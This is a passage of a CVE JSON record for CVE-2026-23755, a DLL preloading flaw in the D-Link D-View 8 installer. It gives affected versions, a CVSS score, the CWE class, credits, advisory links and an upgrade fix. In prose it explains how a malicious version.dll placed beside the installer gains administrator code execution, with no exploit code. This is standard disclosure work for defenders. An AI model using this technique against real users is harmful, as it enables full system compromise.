"affected": [
{
"defaultStatus": "unaffected",
"product": "D-View 8",
"vendor": "D-Link",
"versions": [
{
"lessThanOrEqual": "2.0.1.107",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:d-view_8:*:*:*:*:*:*:*:*",
"versionEndIncluding": "2.0.1.107",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Kazuma Matsumoto, a security researcher at GMO Cybersecurity by IERAE, Inc."
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an uncontrolled search path vulnerability in the installer. When executed with elevated privileges via UAC, the installer attempts to load version.dll from its execution directory, allowing DLL preloading. An attacker can supply a malicious version.dll alongside the legitimate installer so that, when a victim runs the installer and approves the UAC prompt, attacker-controlled code executes with administrator privileges. This can lead to full system compromise."
}
],
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an uncontrolled search path vulnerability in the installer. When executed with elevated privileges via UAC, the installer attempts to load version.dll from its execution directory, allowing DLL preloading. An attacker can supply a malicious version.dll alongside the legitimate installer so that, when a victim runs the installer and approves the UAC prompt, attacker-controlled code executes with administrator privileges. This can lead to full system compromise."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "LOCAL",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "ACTIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-427",
"description": "CWE-427 Uncontrolled Search Path Element",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-14T02:09:24.354Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"vendor-advisory",
"patch"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10471"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-dview-8-installer-dll-preloading-via-uncontrolled-search-path"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later.\u003cbr\u003e"
}
],
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later."
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link D-View 8 Installer DLL Preloading via Uncontrolled Search Path",
"x_generator": {
"engine": "Vulnogram 0.5.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2026-23755",
"datePublished": "2026-01-21T18:02:30.160Z",
"dateReserved": "2026-01-15T18:42:20.938Z",
"dateUpdated": "2026-05-14T02:09:24.354Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}